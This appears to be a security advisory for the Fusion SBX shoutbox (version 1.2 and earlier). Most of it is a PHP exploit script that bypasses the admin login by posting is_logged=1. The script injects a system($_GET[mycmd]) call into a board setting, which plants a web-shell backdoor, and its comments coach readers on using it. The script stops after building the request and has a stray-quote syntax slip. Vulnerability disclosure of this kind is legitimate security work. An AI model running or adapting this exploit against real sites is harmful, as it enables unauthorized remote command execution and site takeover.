Summary
Fusion SBX "will allow your visitors to post comments on your sites, or just say hi. And the best of all is that, it is flat-file, that means that you do not need a MySQL database to install Fusion SBX. You have complete control over the shoutout board".

A vulnerability in Fusion SBX allows remote attackers to modify the product's settings without knowing the administrator password, in addition by injecting arbitrary PHP code to one of the board's settings a remote attacker is able to cause the program to execute arbitrary code.

Credit:
The information has been provided by Dave.

Details
Vulnerable Systems:
* Fusion SBX version 1.2 and prior

Exploit:
<?
/*
* Fusion SBX <= 1.2 admin panel login bypass and remote-command execution exploit
* Exploit discovered 2005-5-2 in about 10 minutes of code lookover for login
* without proper details, then fooled around and found this nice remote command
* execution bug with it.
*
* This code will open a backdoor on the requested site running Fusion SBX 1.2 or
* lower, so you can just call www.site.com/sbx/index.php?mycmd=id or something.
* Newbie tip: Look in the source code after loading an attacked page for a
* properly-formatted command result that isn't all just stuffed on one line.
*
* When you execute commands using this bug, it'll give some error about headers
* already sent, but that's ok. Hacking is sometimes messy.
*
* irc.kidindustries.net #main
* dave {AT] kidindustries !DOT% net
*
* They call me Davus... Also known as Kidiot or Hook?
* NOT Dedicated to the Habbo kiddies... OK, maybe some of 'em. ;)
* Greets to Sirak, Ed, Pyxsul, and remember... CHRISSY > YOU
* SecuriTeam/

$host = "localhost";
$path = "/sbx/admin/"; // Starting and trailing slash needed
(/sbx/admin/ and such)

echo "[+] URL: http://$host$path\n";

$post =
"set2=basic&admin_set2=standard&lang2=english&plimit2=10".
"&noname2=Guest&refresh2=120&maxname2=30%3B%40system".
"%28%24_GET%5Bmycmd%5D%29&maxmess2=120&maxlink2=120".
"&wordbanning2=1&maxword2=20 "&wrapstat2=1&postorder2=1".
"&setsubmit=Commit+Changes&is_logged=1";
// Didn't trim up $post from useless variables such as the submit button, but whatever.

$req = "POST $path?settings HTTP/1.0\r\n";
$req .= "Host: $host\r\n";
$req .= "Connection: close\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Length: ".strlen($post)."\r\n\r\n";

$req .= $post;

echo "[+] Request built, using:\n$post\nas post data\n";